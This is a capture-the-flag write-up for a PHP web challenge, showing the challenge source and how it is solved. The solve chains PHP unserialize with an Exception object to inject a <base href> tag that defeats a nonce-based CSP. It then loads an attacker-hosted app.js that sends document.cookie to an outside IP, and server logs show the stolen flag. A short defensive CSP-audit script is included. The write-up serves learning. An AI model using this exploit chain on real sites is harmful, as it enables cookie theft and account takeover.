SSL Digital Certificate

SSL digital certificate and native-class bypass

View the source with F12

<?php
if(!isset($_GET['user'])&&!isset($_GET['username'])&&!isset($_GET['source'])&&!isset($_GET['query'])){
    header("Location: ./?username=guest");
    die();
}
$test=md5(uniqid('',true));
header("Content-Security-Policy: script-src 'strict-dynamic' 'nonce-$test'; img-src 'self'; style-src 'self'; font-src 'self'; frame-src 'none' ");
header ( "Cache-Control: no-cache, must-revalidate " );
function getCurrentUrl(){
    $scheme = $_SERVER['REQUEST_SCHEME'];
    $domain = $_SERVER['HTTP_HOST'];
    $requestUri = $_SERVER['REQUEST_URI'];
    $currentUrl = $scheme . "://" . $domain . $requestUri;
    return $currentUrl;
}
class user{
    public $username;
    public function __wakeup(){
        if (is_string($this->username)){
            if (preg_match('/script|<|>|onload|onerror/i',$this->username)){
                die('no xss');
            }
            else{
                echo '<h1 id="username">'.htmlentities('welcome back '.$this->username).'</h1>';
            }
        }
        else{
            echo '<h1 id="username">'.$this->username.'&nbsp&nbspis&nbsp&nbspnot&nbsp&nbspallowed,&nbsp&nbsponly&nbsp&nbspstring'.'</h1>';
            file_put_contents('admin.log',$_GET['user']); //admin will check who attacks him in /admin.php
        }
    }
}
if (isset($_GET['source'])){
    $text=file_get_contents(__FILE__);
    echo $text;
    die();
}
if (isset($_GET['query'])){
    //drive bot to visit your page
    //source code : browser.get('http://127.0.0.1/?'+sys.argv[1])
    //query example:
    //your url : httP://127.0.0.1/?username=guest
    //query : username=guest
    $text=escapeshellarg($_GET['query']);
    #echo($text);
    system('python /var/xssbot/xssbot.py '.$text);
    //sleep(3);
    die();
}
echo "
<html>
<head>
<link rel='stylesheet' href='./css/stylesheet.css'>
</head>
";
echo "<!--?source=1-->\n";
echo "<body>\n";
if (isset($_GET['user'])){
    unserialize(urldecode(base64_decode($_GET['user'])));
}
else if(isset($_GET['username'])){
    echo '<h1 id="username">'.htmlentities('hello '.$_GET['username']).'</h1>';
}

echo '<div id="particles-js"></div>';

echo "
<script nonce='$test' src='./js/jquery-1.12.0.js'></script>
<script nonce='$test' src='./js/particles.min.js'></script>
<script nonce='$test' src='./js/app.js'></script>
";
echo "</body>
</html>
";
?>

Auditing the code shows two layers to get past. The first is the is_string() check, which can be bypassed with the native class Exception(): a non-string username goes into the else branch, where it is echoed without htmlentities(), and echoing an object calls its __toString(), so the Exception's message lands in the page unescaped.

Once past the first layer, we run into the CSP (SSL digital certificate):

script-src 'strict-dynamic' 'nonce-$test';

Because the nonce is derived from uniqid(), it cannot be known in advance, so we turn to these lines instead:

<script nonce='$test' src='./js/jquery-1.12.0.js'></script>
<script nonce='$test' src='./js/particles.min.js'></script>
<script nonce='$test' src='./js/app.js'></script>

These script tags carry a valid nonce but use relative src paths, so we can change where they resolve to by pointing the document base at our own server:

<base href="//xx.xx.xx.xx:22222">
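The reason the base tag works is that the challenge's CSP has no base-uri directive (and base-uri does not fall back to default-src). The following checker is an added example, not code from the writeup or the challenge: it parses the header the challenge sends (copied from the source, nonce replaced by a placeholder) and reports that gap; FIXED_CSP is an assumed hardened variant, not anything the challenge ships.

```python
"""Audit a Content-Security-Policy header for the gap the <base href> trick relies on."""
from typing import Dict, List

# Header the challenge sends (copied from the page); the md5(uniqid()) nonce is a placeholder.
CHALLENGE_CSP = ("script-src 'strict-dynamic' 'nonce-PLACEHOLDER'; img-src 'self'; "
                 "style-src 'self'; font-src 'self'; frame-src 'none' ")

# Assumed hardened variant (our own suggestion, not the challenge's header).
FIXED_CSP = CHALLENGE_CSP + "; base-uri 'none'; default-src 'self'; object-src 'none'"


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split 'dir src src; dir src' into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for clause in header.split(";"):
        tokens = clause.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def audit_csp(header: str) -> List[str]:
    """Return findings; an empty list means none of the checked gaps is present."""
    policy = parse_csp(header)
    findings: List[str] = []
    script_src = policy.get("script-src") or policy.get("default-src", [])
    nonce_based = any(t.startswith("'nonce-") for t in script_src)
    # base-uri does NOT inherit from default-src. Without it, an injected
    # <base href="//other-host"> re-resolves every relative src, so the page's own
    # <script nonce=... src="./js/app.js"> still passes the nonce check but is
    # fetched from the other host. 'strict-dynamic' ignores host sources and
    # 'self', so restricting base-uri is the directive that actually closes this.
    if nonce_based and "base-uri" not in policy:
        findings.append("base-uri missing: nonce'd relative script src can be redirected via <base>")
    # Fetch directives that are not listed fall back to default-src; with neither
    # present, directives such as connect-src are unrestricted.
    if "default-src" not in policy:
        findings.append("default-src missing: unlisted fetch directives are unrestricted")
    # object-src falls back to default-src; with neither, <object>/<embed> are unrestricted.
    if "object-src" not in policy and "default-src" not in policy:
        findings.append("object-src missing: no default-src to fall back on")
    return findings


if __name__ == "__main__":
    for name, csp in (("challenge", CHALLENGE_CSP), ("fixed", FIXED_CSP)):
        print(name, audit_csp(csp) or "no findings")
```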

Putting the two together gives an exploit:

<?php
class user{
public $username;
}
$user=new user();
$user->username=new Exception('<base href="//xx.xx.xx.xx:22222">');
echo base64_encode(serialize($user));

Then, on an Ubuntu host, we create the ./js/app.js file that the hijacked script tag will load:

root@VM-4-10-ubuntu:~# cat ./js/app.js 
window.open('http://xx.xx.xx.xx:22222/'+document.cookie)

The payload sent to the bot is:

?query=user=<base64 code>

On our server we then see:

49.235.148.38 - - [14/Jul/2021 13:36:29] "GET /js/particles.min.js HTTP/1.1" 404 -
49.235.148.38 - - [14/Jul/2021 13:36:29] code 404, message File not found
49.235.148.38 - - [14/Jul/2021 13:36:29] "GET /flag=ctfshow%7Bc4580781-d9de-449f-a8ec-f79c6464f037%7D%0A HTTP/1.1" 404 -